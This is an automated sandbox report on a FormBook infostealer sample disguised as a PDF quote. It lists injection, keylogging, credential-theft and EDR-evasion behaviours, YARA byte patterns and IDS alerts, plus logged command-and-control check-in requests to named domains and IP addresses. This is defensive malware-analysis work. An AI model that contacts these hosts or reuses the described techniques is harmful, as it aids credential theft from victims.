Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
quote894590895pdf.exe

Overview

General Information

Sample name:quote894590895pdf.exe
Analysis ID:1531713
MD5:967822af836343e721975a8fd39fde4f
SHA1:b6d9879f5bdc11fec1d2e296e29affeebd8f1367
SHA256:96a5dffe8d545b87cd9038bc05277e2694e01062535c5ef81d380138a20bc652
Tags:exeuser-lowmal3
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • quote894590895pdf.exe (PID: 7668 cmdline: "C:\Users\user\Desktop\quote894590895pdf.exe" MD5: 967822AF836343E721975A8FD39FDE4F)
    • svchost.exe (PID: 7688 cmdline: "C:\Users\user\Desktop\quote894590895pdf.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • csDaoUagQFfwf.exe (PID: 2872 cmdline: "C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • isoburn.exe (PID: 8096 cmdline: "C:\Windows\SysWOW64\isoburn.exe" MD5: BF19DD525C7D23CAFC086E9CCB9C06C6)
          • csDaoUagQFfwf.exe (PID: 3632 cmdline: "C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7456 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000006.00000002.3585567216.0000000004D90000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000006.00000002.3585567216.0000000004D90000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2bd60:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13e4f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000007.00000002.3587672328.0000000005600000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000007.00000002.3587672328.0000000005600000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x4bc7b:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x33d6a:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000001.00000002.2123235941.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries
        SourceRuleDescriptionAuthorStrings
        1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          1.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e2a3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16392:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          1.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            1.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2f0a3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17192:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\quote894590895pdf.exe", CommandLine: "C:\Users\user\Desktop\quote894590895pdf.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\quote894590895pdf.exe", ParentImage: C:\Users\user\Desktop\quote894590895pdf.exe, ParentProcessId: 7668, ParentProcessName: quote894590895pdf.exe, ProcessCommandLine: "C:\Users\user\Desktop\quote894590895pdf.exe", ProcessId: 7688, ProcessName: svchost.exe
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\quote894590895pdf.exe", CommandLine: "C:\Users\user\Desktop\quote894590895pdf.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\quote894590895pdf.exe", ParentImage: C:\Users\user\Desktop\quote894590895pdf.exe, ParentProcessId: 7668, ParentProcessName: quote894590895pdf.exe, ProcessCommandLine: "C:\Users\user\Desktop\quote894590895pdf.exe", ProcessId: 7688, ProcessName: svchost.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-11T16:46:18.519074+020028554651A Network Trojan was detected192.168.2.4497373.33.130.19080TCP
            2024-10-11T16:46:46.899827+020028554651A Network Trojan was detected192.168.2.44991475.2.103.2380TCP
            2024-10-11T16:47:00.103088+020028554651A Network Trojan was detected192.168.2.44999784.32.84.3280TCP
            2024-10-11T16:47:14.642002+020028554651A Network Trojan was detected192.168.2.450014172.232.112.22180TCP
            2024-10-11T16:47:50.044927+020028554651A Network Trojan was detected192.168.2.450018154.82.70.19580TCP
            2024-10-11T16:48:03.253231+020028554651A Network Trojan was detected192.168.2.4500223.33.130.19080TCP
            2024-10-11T16:48:16.622040+020028554651A Network Trojan was detected192.168.2.450026207.154.246.2180TCP
            2024-10-11T16:48:30.033948+020028554651A Network Trojan was detected192.168.2.45003065.21.196.9080TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-11T16:46:39.268041+020028554641A Network Trojan was detected192.168.2.44986275.2.103.2380TCP
            2024-10-11T16:46:41.903142+020028554641A Network Trojan was detected192.168.2.44987875.2.103.2380TCP
            2024-10-11T16:46:44.361140+020028554641A Network Trojan was detected192.168.2.44989475.2.103.2380TCP
            2024-10-11T16:46:52.464063+020028554641A Network Trojan was detected192.168.2.44994684.32.84.3280TCP
            2024-10-11T16:46:55.003767+020028554641A Network Trojan was detected192.168.2.44996284.32.84.3280TCP
            2024-10-11T16:46:57.550227+020028554641A Network Trojan was detected192.168.2.44997984.32.84.3280TCP
            2024-10-11T16:47:07.008317+020028554641A Network Trojan was detected192.168.2.450011172.232.112.22180TCP
            2024-10-11T16:47:09.597012+020028554641A Network Trojan was detected192.168.2.450012172.232.112.22180TCP
            2024-10-11T16:47:12.123305+020028554641A Network Trojan was detected192.168.2.450013172.232.112.22180TCP
            2024-10-11T16:47:22.567893+020028554641A Network Trojan was detected192.168.2.450015154.82.70.19580TCP
            2024-10-11T16:47:25.112083+020028554641A Network Trojan was detected192.168.2.450016154.82.70.19580TCP
            2024-10-11T16:47:27.659030+020028554641A Network Trojan was detected192.168.2.450017154.82.70.19580TCP
            2024-10-11T16:47:55.563773+020028554641A Network Trojan was detected192.168.2.4500193.33.130.19080TCP
            2024-10-11T16:47:58.112996+020028554641A Network Trojan was detected192.168.2.4500203.33.130.19080TCP
            2024-10-11T16:48:00.795767+020028554641A Network Trojan was detected192.168.2.4500213.33.130.19080TCP
            2024-10-11T16:48:08.964641+020028554641A Network Trojan was detected192.168.2.450023207.154.246.2180TCP
            2024-10-11T16:48:11.557869+020028554641A Network Trojan was detected192.168.2.450024207.154.246.2180TCP
            2024-10-11T16:48:14.038340+020028554641A Network Trojan was detected192.168.2.450025207.154.246.2180TCP
            2024-10-11T16:48:22.411845+020028554641A Network Trojan was detected192.168.2.45002765.21.196.9080TCP
            2024-10-11T16:48:24.942364+020028554641A Network Trojan was detected192.168.2.45002865.21.196.9080TCP
            2024-10-11T16:48:27.482921+020028554641A Network Trojan was detected192.168.2.45002965.21.196.9080TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-11T16:46:41.903142+020028563181A Network Trojan was detected192.168.2.44987875.2.103.2380TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: quote894590895pdf.exeReversingLabs: Detection: 36%
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.3585567216.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3587672328.0000000005600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2123235941.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2123644785.00000000037F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3585604704.0000000004DE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2124174158.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3584633901.00000000030D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3585641662.0000000003050000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: quote894590895pdf.exeJoe Sandbox ML: detected
            Source: quote894590895pdf.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: isoburn.pdb source: svchost.exe, 00000001.00000003.2091696236.0000000003234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2091542345.000000000321B000.00000004.00000020.00020000.00000000.sdmp, csDaoUagQFfwf.exe, 00000005.00000002.3585138794.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: isoburn.pdbGCTL source: svchost.exe, 00000001.00000003.2091696236.0000000003234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2091542345.000000000321B000.00000004.00000020.00020000.00000000.sdmp, csDaoUagQFfwf.exe, 00000005.00000002.3585138794.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: csDaoUagQFfwf.exe, 00000005.00000002.3584953485.000000000055E000.00000002.00000001.01000000.00000005.sdmp, csDaoUagQFfwf.exe, 00000007.00000002.3584631853.000000000055E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: quote894590895pdf.exe, 00000000.00000003.1725112993.0000000004780000.00000004.00001000.00020000.00000000.sdmp, quote894590895pdf.exe, 00000000.00000003.1725432268.0000000004630000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2023247338.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2025297928.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2123694316.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2123694316.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.3585874806.000000000526E000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.2123546944.0000000004D7B000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.2126127182.0000000004F20000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.3585874806.00000000050D0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: quote894590895pdf.exe, 00000000.00000003.1725112993.0000000004780000.00000004.00001000.00020000.00000000.sdmp, quote894590895pdf.exe, 00000000.00000003.1725432268.0000000004630000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.2023247338.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2025297928.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2123694316.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2123694316.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.3585874806.000000000526E000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.2123546944.0000000004D7B000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.2126127182.0000000004F20000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.3585874806.00000000050D0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: isoburn.exe, 00000006.00000002.3586231095.00000000056FC000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 00000006.00000002.3584832817.00000000032E7000.00000004.00000020.00020000.00000000.sdmp, csDaoUagQFfwf.exe, 00000007.00000002.3585941333.00000000031CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2443157559.00000000002FC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: isoburn.exe, 00000006.00000002.3586231095.00000000056FC000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 00000006.00000002.3584832817.00000000032E7000.00000004.00000020.00020000.00000000.sdmp, csDaoUagQFfwf.exe, 00000007.00000002.3585941333.00000000031CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2443157559.00000000002FC000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00EC449B GetFileAttributesW,FindFirstFileW,FindClose,0_2_00EC449B
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00ECC7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00ECC7E8
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00ECC75D FindFirstFileW,FindClose,0_2_00ECC75D
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00ECF021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00ECF021
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00ECF17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00ECF17E
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00ECF47F FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00ECF47F
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00EC3833 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00EC3833
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00EC3B56 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00EC3B56
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00ECBD48 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00ECBD48

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49737 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49878 -> 75.2.103.23:80
            Source: Network trafficSuricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.4:49878 -> 75.2.103.23:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49862 -> 75.2.103.23:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49914 -> 75.2.103.23:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49946 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49962 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49979 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49894 -> 75.2.103.23:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49997 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50011 -> 172.232.112.221:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50019 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50026 -> 207.154.246.21:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50021 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50018 -> 154.82.70.195:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50030 -> 65.21.196.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50025 -> 207.154.246.21:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50015 -> 154.82.70.195:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50016 -> 154.82.70.195:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50028 -> 65.21.196.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50012 -> 172.232.112.221:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50020 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50014 -> 172.232.112.221:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50027 -> 65.21.196.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50029 -> 65.21.196.90:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50022 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50013 -> 172.232.112.221:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50017 -> 154.82.70.195:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50023 -> 207.154.246.21:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50024 -> 207.154.246.21:80
            Source: DNS query: www.i8ty.xyz
            Source: DNS query: www.030002832.xyz
            Source: Joe Sandbox ViewIP Address: 65.21.196.90 65.21.196.90
            Source: Joe Sandbox ViewIP Address: 84.32.84.32 84.32.84.32
            Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
            Source: Joe Sandbox ViewASN Name: CP-ASDE CP-ASDE
            Source: Joe Sandbox ViewASN Name: ROOTNETWORKSUS ROOTNETWORKSUS
            Source: Joe Sandbox ViewASN Name: NTT-LT-ASLT NTT-LT-ASLT
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00ED2404 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00ED2404
            Source: global trafficHTTP traffic detected: GET /j5xl/?Vt8pNT=UbSkj6Vbkzt4xk/BQnnYbYTXmRPkUKt1YkqUNfRg8HqP8fdFaUbTKuozRqV2B7LpcmAJePLPvqhI8UaQpGGHaeFBe2TuO5Ibc+NjtYApVRqMFDlNrBJ0s0I=&e4x=ktCxONu0 HTTP/1.1Host: www.wishlists.funAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /pw0n/?Vt8pNT=jKWgZZqB+xPbw8PyTqx38QFiti6jsVGm8xRMwOckZz0bSXvbA9Gl3dJBJEH5Yfm2q9TaWbUP2YXuBUhdjRY21f3om0mDchB/JCkr7kUgsXxGn5FGHqIfEsY=&e4x=ktCxONu0 HTTP/1.1Host: www.webeuz.buzzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /iuk8/?e4x=ktCxONu0&Vt8pNT=rMW8FEGQdm97FGtaoxXiHNwQVR6R/A+6gHbLU36mRaIlSKTub3c0+o2OYHMPzrTne2tl6yO2tBcnHpARWLNmulEVVzZjbBkPJkvKkDIrLUALH1enLsdJRAo= HTTP/1.1Host: www.b-ambu.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /4p3r/?Vt8pNT=LOIXgNA6yVbIhH/97YISWpaaeYXaQBHJvGCpm6n32QVnUTq8xwvOH/+QlB31wK7nJw4esWbzPeXe8oRJ9Ty3LI5fbZj0io6+NlMHOgvhq63Ws7W9v5i5bXc=&e4x=ktCxONu0 HTTP/1.1Host: www.weeksee.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /u1em/?e4x=ktCxONu0&Vt8pNT=KznUpk/xHe6n1X9mtj5I6E8xs3xw/O5MevsqvgsUAqRDUKoafro8pFGdMZBnRKuB8O2sPyUarQrP+wlcZkakd0lPWPqUfDTmoYHoDPqwNuY6qLwvsQiX+Fs= HTTP/1.1Host: www.ddzc.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /bba0/?Vt8pNT=z2tBdSkYWISVZlGeY1UMjB+aahxirAP0BGL3+4ox4Yqg2ZTTHsJ+XsYwiumYoM/4lsnVRmhb/JIyqNziYYbWgSouB4vi/+UmCom1xZAxGA7QHOLM5wPW2IM=&e4x=ktCxONu0 HTTP/1.1Host: www.trencheslondon.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /0gyy/?Vt8pNT=pcEhds/h42nAYAT0LBaH8yStEyuK9E/vhBYbG/7jpbqcIU9VeO8n0URcBUZr7wQGt8dA+7YpmgvBimgGVM12DtGPEZbYI7iEEo2c2QS/At3BiK+lDzdQYd4=&e4x=ktCxONu0 HTTP/1.1Host: www.i8ty.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
